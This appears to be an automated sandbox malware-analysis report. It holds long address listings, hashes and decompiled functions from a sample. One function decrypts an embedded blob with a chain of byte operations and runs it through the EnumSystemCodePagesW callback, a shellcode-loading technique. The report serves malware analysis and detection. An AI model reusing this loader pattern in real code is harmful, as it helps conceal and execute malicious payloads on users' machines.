                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x00000000
                                                  0x004068b3
                                                  0x004061db
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406469
                                                  0x0040646c
                                                  0x0040640f
                                                  0x00406415
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040646e
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x00000000
                                                  0x0040640c
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406318
                                                  0x0040631b
                                                  0x00406292
                                                  0x00406292
                                                  0x00406298
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x00406348
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406321
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00000000
                                                  0x0040628f
                                                  0x0040631b
                                                  0x00406224
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x0040683d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x00000000
                                                  0x004069b0
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00000000
                                                  0x00406805
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                  • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                  • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                  • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003D10, Relevance: 4.7, APIs: 3, Instructions: 248COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 16%
                                                  			E10003D10(void* __edx, void* __eflags) {
				signed int _v20;
				signed int _v24;
				signed int _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				intOrPtr _t126;
				void* _t147;
				void* _t221;
				intOrPtr* _t305;

				_v20 = 0;
				 *_t305 = 0xbebc200; // executed
				_t126 = E1000593F(_t147, __edx, _t221); // executed
				_v20 = _t126;
				if(_v20 != 0) {
					 *_t305 = _v20;
					_v40 = 0xde;
					_v36 = 0xbebc200;
					E10007DF0();
					_v24 = 0;
					_v24 = 0;
					while(_v24 < 0x1422) {
						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) - 0x39;
						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
						_v25 = (_v25 & 0x000000ff) - 0xb6;
						_v25 = (_v25 & 0x000000ff) >> 0x00000001 | (_v25 & 0x000000ff) << 0x00000007;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000005 | (_v25 & 0x000000ff) << 0x00000003;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = (_v25 & 0x000000ff) + 0x6f;
						_v25 = _v25 & 0x000000ff ^ 0x000000c1;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0x000000b0;
						_v25 = (_v25 & 0x000000ff) + 0x1c;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000001 | (_v25 & 0x000000ff) << 0x00000007;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) - 0x86;
						_v25 = (_v25 & 0x000000ff) >> 0x00000005 | (_v25 & 0x000000ff) << 0x00000003;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - _v24;
						 *((char*)(_v24 +  &E1001A000)) = _v25;
						_v24 = _v24 + 1;
					}
					 *_t305 =  &E1001A000;
					_v40 = 0;
					_v32 = 0;
					EnumSystemCodePagesW(??, ??); // executed
				}
				return 0;
			}















                                                  0x10003d19
                                                  0x10003d20
                                                  0x10003d27
                                                  0x10003d2c
                                                  0x10003d33
                                                  0x10003d3c
                                                  0x10003d3f
                                                  0x10003d47
                                                  0x10003d4f
                                                  0x10003d54
                                                  0x10003d5b
                                                  0x10003d62
                                                  0x10003d7b
                                                  0x10003d86
                                                  0x10003d90
                                                  0x10003da5
                                                  0x10003db4
                                                  0x10003dc9
                                                  0x10003dd7
                                                  0x10003de5
                                                  0x10003dfa
                                                  0x10003e08
                                                  0x10003e14
                                                  0x10003e22
                                                  0x10003e37
                                                  0x10003e45
                                                  0x10003e50
                                                  0x10003e5e
                                                  0x10003e6c
                                                  0x10003e7a
                                                  0x10003e88
                                                  0x10003e9d
                                                  0x10003ea9
                                                  0x10003eb8
                                                  0x10003ec6
                                                  0x10003edb
                                                  0x10003ee9
                                                  0x10003ef5
                                                  0x10003f03
                                                  0x10003f12
                                                  0x10003f1e
                                                  0x10003f2c
                                                  0x10003f37
                                                  0x10003f45
                                                  0x10003f5a
                                                  0x10003f68
                                                  0x10003f7d
                                                  0x10003f86
                                                  0x10003f94
                                                  0x10003fa9
                                                  0x10003fb7
                                                  0x10003fc3
                                                  0x10003fd1
                                                  0x10003fda
                                                  0x10003fe7
                                                  0x10003fe7
                                                  0x10003ff7
                                                  0x10003ffa
                                                  0x10004002
                                                  0x10004005
                                                  0x1000400b
                                                  0x10004017

                                                  APIs
                                                  • _malloc.LIBCMT ref: 10003D27
                                                    • Part of subcall function 1000593F: __FF_MSGBANNER.LIBCMT ref: 10005956
                                                    • Part of subcall function 1000593F: __NMSG_WRITE.LIBCMT ref: 1000595D
                                                    • Part of subcall function 1000593F: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005982
                                                  • _memset.LIBCMT ref: 10003D4F
                                                  • EnumSystemCodePagesW.KERNELBASE ref: 10004005
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                                                  • String ID:
                                                  • API String ID: 2588709530-0
                                                  • Opcode ID: 2db08ae7cdb19e41fc02555eedf6db4881800d1b5cfa1abd6ab1d9ed3697331f
                                                  • Instruction ID: f94ce2c0b69b31fde3a37081a8953653fea7de878c9e4e290877bd2c3745c442
                                                  • Opcode Fuzzy Hash: 2db08ae7cdb19e41fc02555eedf6db4881800d1b5cfa1abd6ab1d9ed3697331f
                                                  • Instruction Fuzzy Hash: 2AA1DB62E191FE4ACF068ABD41629FFBEF35E96181F0E058ADCD177382C5A01904D7B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                  0x00405e9e
                                                  0x00405ea7
                                                  0x00000000
                                                  0x00405eb4
                                                  0x00405eaa
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                  • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                  • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                  • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                  • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
